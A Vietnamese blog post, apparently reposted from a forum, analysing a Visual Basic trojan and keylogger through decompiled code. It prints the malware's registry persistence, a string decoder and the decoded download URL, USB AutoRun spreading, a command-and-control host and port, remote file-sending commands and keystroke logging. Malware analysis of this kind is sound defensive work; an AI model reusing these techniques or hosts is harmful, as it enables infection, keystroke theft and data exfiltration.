Tác giả nó chỉ ăn lui ăn lại một thứ mà ko chán nhỉ ?
-
Dùng VB Decompiler thi nhận ra một số đoạn đáng chú ý sau :
Project gồm 2 form : Form1 và Form2
Form 1 gồm :
Các thao tác hoạt động cơ bản của virus
loc_412533: If CBool((Me.global_88 = "Saturday") Or (Me.global_88 = "Tuesday")) Then '412595
loc_412544: var_AC = CVar(Unknown_40F54C(Me.global_88, CLng(Me.global_72), &H0, &H0, Me.global_72, "", "", "", "") & "\kdcoms32.dll") 'String
loc_412553: If Not (Unknown_40F1FC(var_AC)) Then '41256C
loc_412564: Timer4.Enabled = &HFF
loc_41256C: End If
Thứ 7 hoặc thứ 3 sẽ tiến hành cho Timer4 làm việc (Update virus)
loc_40F2B1: LitStr "\userinit.exe"
....
loc_40F2C2: LitStr "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
loc_410A66: LitStr "\system32\system.exe"
loc_41207D: &H80000002 = Unknown_40F620("SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "Explorer.exe", &H0)
loc_4120B7: &H80000002 = Unknown_40F620("SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Userinit", Unknown_40F54C() & "\system32\userinit.exe,")
loc_4121A3: var_AC = CVar(Unknown_40F54C("") & "\kdcoms.dll") 'String
loc_4121B1: If Unknown_40F1FC(var_AC) Then '4121FA
loc_4121CD: var_C8 = Unknown_40F54C() & "\kdcoms.dll"
loc_4121D0: ext_401090
loc_4121EC: var_AC = CVar(Unknown_40F54C("", &H0) & "\kdcoms.dll") 'String
loc_4121EF: ext_401030
loc_4121FA: End If
Private Sub Timer4_Timer() '4101D0
'Data Table: 40BD20
loc_4100D4: On Error GoTo 0
loc_4100E5: Timer4.Enabled = &H0
loc_4100FB: var_9C = CVar(Unknown_40F54C() & "\kdcoms32.dll") 'String
loc_410109: If Unknown_40F1FC(var_9C) Then '4101CA
loc_41011C: If (Me.global_88 = "Tuesday") Then '410174
loc_41014A: var_C8 = CVar(Unknown_40F54C(CVar(Decode("q}}yC88orun|7v‚xy n{j7lxv8qjhxwurwn8orun|8}j|t7{j{", &H9))) & "\system32\task.exe") 'String
loc_410158: Call var_88.DL1.Address_4165C0
loc_410171: GoTo loc_4101C8
loc_410174: End If
loc_4101A1: var_C8 = CVar(Unknown_40F54C(CVar(Decode("q}}yC88orun|7v‚xy n{j7lxv8yq~xwp6qxwp8orun|8}j|t7{j{", &H9)), var_C8) & "\system32\task.exe") 'String
loc_4101AF: Call var_88.DL1.Address_4165C0
loc_4101C8: ' Referenced from: 410171
loc_4101CA: End If
loc_4101CE: Exit Sub
End Sub
Function Decode :
Public Function Decode(Data, Depth) '40FD1C
'Data Table: 40BD20
loc_40FC5A: On Error GoTo 0
loc_40FC69: For var_9A = &H1 To CInt(Len(Data)): var_96 = var_9A 'Integer
loc_40FC71: var_BC = 1
loc_40FC82: var_8C = ext_401018
loc_40FC92: var_8E = ext_401004
loc_40FC9D: If (Depth = &H0) Then '40FCA7
loc_40FCA4: Depth = &H28
loc_40FCA7: End If
loc_40FCB0: If (Depth > 254) Then '40FCBB
loc_40FCB8: Depth = 254
loc_40FCBB: End If
loc_40FCCF: If ((var_8E - Depth) < &H0) Then '40FCDE
loc_40FCDB: var_8E = (var_8E + 255)
loc_40FCDE: End If
loc_40FCE7: ext_401054
loc_40FCFF: var_94 = var_94 & CStr("")
loc_40FD07: Next var_9A 'Integer
loc_40FD11: var_88 = var_94
loc_40FD16: Result = arg_14: Exit Sub
End Function
Nếu bạn đã từng đọc qua Function này ở Source nào đó thì bạn sẽ nhận ra ngày, đoạn code gốc :
Public Function Decode(Data As String, Optional Depth As Integer) As String
Dim TempChar As String
Dim TempAsc As Integer
Dim NewData As String
Dim vChar As Integer
For vChar = 1 To Len(Data)
TempChar = Mid$(Data, vChar, 1)
TempAsc = Asc(TempChar)
If Depth = 0 Then Depth = 40
If Depth > 254 Then Depth = 254
TempAsc = TempAsc - Depth
If TempAsc < 0 Then TempAsc = TempAsc + 255
TempChar = Chr(TempAsc)
NewData = NewData & TempChar
Next vChar
Decode = NewData
End Function
Kết quả giải mã String : q}}yC88orun|7v‚xyn{j7lxv8qjhxwurwn8orun|8}j|t7{j{ " là http://files.myopera.com/hav_online/files/task.rar
loc_41141B: var_1AC = var_17C And (var_17C <> "A")
loc_41142A: ext_401088
loc_411435: ext_40102C
loc_41145A: If CBool(var_1CC And (var_1CC <> "B")) Then '411B9C
loc_411461: var_86 = &HFF
loc_411477: var_15C = var_DC & "\" & "Secret.exe"
loc_41147F: VarLateMemCallLdVar
loc_411496: If CBool(Not var_9C) Then '41154F
loc_4114E2: var_21C = CStr(var_DC & "\" & "Secret.exe")
loc_4114FB: var_218 = App.Path & "\" & App.EXEName & ".exe"
loc_4114FE: ext_401070
loc_41153C: var_204 = CStr(var_DC & "\" & "Secret.exe")
loc_411540: ext_401090
loc_41154F: End If
loc_41155B: var_12C = var_DC & "\AutoRun.inf"
loc_411563: VarLateMemCallLdVar
loc_411574: If CBool(var_9C) Then '4115AF
loc_41158A: var_204 = CStr(var_DC & "\AutoRun.inf")
loc_41158E: ext_401090
loc_4115A3: var_12C = var_DC & "\AutoRun.inf"
loc_4115A7: ext_401030
loc_4115AF: End If
loc_4115C7: Open CStr(var_DC & "\AutoRun.inf") For Output As &H1 Len = &HFF
loc_4115D8: Print &H1, "[AutoRun]"
loc_4115E5: Print &H1, "open=Secret.exe"
loc_4115F2: Print &H1, ";shell\open=Open(&O)"
loc_4115FF: Print &H1, "shell\open\Command=Secret.exe"
loc_41160C: Print &H1, "shell\open\Default=1"
loc_411619: Print &H1, ";shell\explore=Manager(&X)"
loc_411626: Print &H1, "shell\explore\Command=Secret.exe"
loc_411630: Close &H1
loc_411645: var_204 = CStr(var_DC & "\AutoRun.inf")
Ghi file Autoruns.inf và Secret.exe vào đĩa USB.
Module1 :
Cho thấy các thao tác KeyLog.
Public Sub init() '410078
'Data Table: 40BD20
loc_40FFA0: On Error GoTo 0
loc_40FFB1: var_98 = CVar(Unknown_40F54C() & "\system32\MSWINSCK.OCX") 'String
loc_40FFC0: If Not (Unknown_40F1FC(var_98)) Then '410056
loc_410006: Open Unknown_40F54C() & "\system32\MSWINSCK.OCX" For Binary As &H1 Len = &HFF
loc_41001D: Put &H1, &H1, LoadResData(101, "CUSTOM")
loc_410025: Close &H1
loc_410044: ext_40103C
loc_410049: var_CC = CVar(%x2 & Unknown_40F54C("Regsvr32", &H2) & "\system32\MSWINSCK.OCX /s")
loc_410056: End If
loc_41006A: Load MemVar_416064
loc_410074: Exit Sub
End Sub
Ghi đè MSWINSCK.OCX bằng Data trong Resource
Form2 gồm : Các lệnh điều khiển Trojan
Private Sub Timer1_Timer() '40F884
'Data Table: 40B764
loc_40F7F4: On Error GoTo 0
loc_40F805: Timer1.Enabled = &H0
loc_40F819: var_98 = var_88.@filesize@
loc_40F82A: If (CInt(var_98) <> &H7) Then '40F867
loc_40F839: call var_88..Address_40D1F0
loc_40F846: var_A8 = "scsd.ath.cx"
loc_40F84C: var_C8 = 6999
loc_40F85C: call var_88..Address_40D1E0
loc_40F867: End If
loc_40F877: var_88.Timer.Enabled = &HFF
loc_40F881: Exit Sub
End Sub
Kết nối với Server qua máy chủ và cổng ở trên.
Private Sub ws_() '410D48
'Data Table: 40B764
loc_410B14: On Error GoTo 0
loc_410B32: Call var_9C.ws.Address_40BA0C
loc_410B57: If (InStr(&H1, "", "@chdirec@", &H0) <> &H0) Then '410BED
loc_410B79: var_88 = ext_401048
loc_410B81: ext_401050
loc_410B8E: ext_401068
loc_410BA4: Dir1.Path = CStr(var_BC)
loc_410BBE: ext_401068
loc_410BD4: File1.Path = CStr(var_BC)
loc_410BE8: Call sendinfo
loc_410BED: End If
loc_410C09: If (InStr(&H1, var_88, "@chdrv@", &H0) <> &H0) Then '410C9F
loc_410C2B: var_88 = ext_401048
loc_410C33: ext_40105C
loc_410C40: ext_401068
loc_410C56: Dir1.Path = CStr(var_BC)
loc_410C70: ext_401068
loc_410C86: File1.Path = CStr(var_BC)
loc_410C9A: Call sendinfo
loc_410C9F: End If
loc_410CBB: If (InStr(&H1, var_88, "@sendfile@", &H0) <> &H0) Then '410D1B
loc_410CC6: Me.global_72 = True
loc_410CEF: Me.global_52 = CVar(ext_401048)
loc_410CFA: Close &H1
loc_410D0D: Open CStr(Me.global_52) For Binary As &H1 Len = &HFF
loc_410D16: Call SendFile
loc_410D1B: End If
loc_410D37: If (InStr(&H1, var_88, "@cancel@", &H0) <> &H0) Then '410D44
loc_410D41: Me.global_104 = &HFF
loc_410D44: End If
loc_410D46: Exit Sub
End Sub
Virus sử dụng Control là MSWINSCK.OCX đã trích xuất làm để tiến hành chờ các gói tin và trả lời các gói tin đó.
Private Sub Timer2_Timer() '411044
'Data Table: 40B764
loc_410D90: On Error GoTo 0
loc_410DAA: Me.global_68 = %x2 & Unknown_414E84(Me.global_68)
loc_410DCA: If ((MemVar_416040 <> "") And (Len(MemVar_416040) > &H2)) Then '410E70
loc_410E07: If CBool((CInt(var_90.@filesize@) = &H7) And (Me.global_72 = False)) Then '410E2F
loc_410E13: var_A0 = CVar("@yahoo@" & MemVar_416040) 'String
loc_410E21: call var_90..Address_0
loc_410E2F: End If
loc_410E46: Open Unknown_40F54C("") & "\kdcoms.dll" For Append As &H2 Len = &HFF
loc_410E58: Print &H2, MemVar_416040
loc_410E62: Close &H2
loc_410E6F: Exit Sub
loc_410E70: End If
loc_410E8F: If (InStr(&H1, Me.global_68, "@enter@", &H0) <> &H0) Then '410F7F
loc_410EBA: Me.global_68 = ext_401048
loc_410ECE: If (Me.global_68 <> "") Then '410F7A
loc_410F0B: If CBool((CInt(var_90.@filesize@) = &H7) And (Me.global_72 = False)) Then '410F36
loc_410F1A: var_A0 = CVar("@yahoo@" & Me.global_68) 'String
loc_410F28: call var_90..Address_0
loc_410F36: End If
loc_410F4D: Open Unknown_40F54C("", Me.global_68, "@enter@", "", &H1, &HFFFFFFFF, &H1) & "\kdcoms.dll" For Append As &H2 Len = &HFF
loc_410F62: Print &H2, Me.global_68
loc_410F6C: Close &H2
loc_410F7A: End If
loc_410F7E: Exit Sub
loc_410F7F: End If
loc_410F90: If (Len(Me.global_68) > &H37) Then '41103C
loc_410FCD: If CBool((CInt(var_90.@filesize@) = &H7) And (Me.global_72 = False)) Then '410FF8
loc_410FDC: var_A0 = CVar("@yahoo@" & Me.global_68) 'String
loc_410FEA: call var_90..Address_0
loc_410FF8: End If
loc_41100F: Open Unknown_40F54C("") & "\kdcoms.dll" For Append As &H2 Len = &HFF
loc_411024: Print &H2, Me.global_68
loc_41102E: Close &H2
loc_41103C: End If
loc_411040: Exit Sub
End Sub
Sau mỗi thao tác Enter sẽ ghi thêm thông tin nhập trước đó vào file kdcoms.dll
Module1 :
Hàm đặt KeyLog (Được gọi ở Form2) qua lênh sau ở Form2 :
loc_410DAA: Me.global_68 = %x2 & Unknown_414E84(Me.global_68)
Nguồn: http://virusvn.com/forum/showthread.php?t=319
No comments:
Post a Comment